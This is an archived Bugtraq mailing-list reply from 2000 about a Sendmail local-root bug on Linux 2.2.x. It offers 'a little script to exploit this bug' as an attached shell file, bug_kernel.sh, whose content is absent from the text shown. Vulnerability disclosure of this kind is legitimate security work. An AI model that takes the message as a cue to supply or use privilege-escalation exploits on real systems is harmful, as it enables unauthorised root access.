[15272] in bugtraq

Re: Sendmail local root exploit on linux 2.2.x

daemon@ATHENA.MIT.EDU (Christophe GRENIER)
Fri Jun 9 23:43:46 2000

Mime-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="969041865-1426321146-960500952=:21915"
Message-Id:  <Pine.LNX.4.21.0006082348200.21915-101000@nef.esiea.fr>
Date:         Thu, 8 Jun 2000 23:49:12 +0200
Reply-To: Christophe GRENIER <grenier@NEF.ESIEA.FR>
From: Christophe GRENIER <grenier@NEF.ESIEA.FR>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <393F8FDC.882BAEE5@real-linux.de>

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

--969041865-1426321146-960500952=:21915
Content-Type: TEXT/PLAIN; charset=US-ASCII

A little script to exploit this bug...

-------------------------------------------------------------------------------
  ,-~~-.___.	 ._. 		  	   -= GRENIER Christophe =-
 / |  '     \	 | |"""""""""|              sysadm de nef.esiea.fr
(  )         0	 | |         |	   	  	   ESIEA
 \_/-, ,----'	 | |         |     	Ecole Superieure d'Informatique -
    ====         !_!--v---v--" 	   	Electronique - Automatique
    /  \-'~;      |""""""""|
   /  __/~| ._-""||        |       	Email: grenier@esiea.fr
 =(  _____|_|____||________| http://www.esiea.fr/public_html/Christophe.GRENIER/
-------------------------------------------------------------------------------

--969041865-1426321146-960500952=:21915
Content-Type: APPLICATION/x-sh; name="bug_kernel.sh"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0006082349120.21915@nef.esiea.fr>
Content-Description:
Content-Disposition: attachment; filename="bug_kernel.sh"
--969041865-1426321146-960500952=:21915--
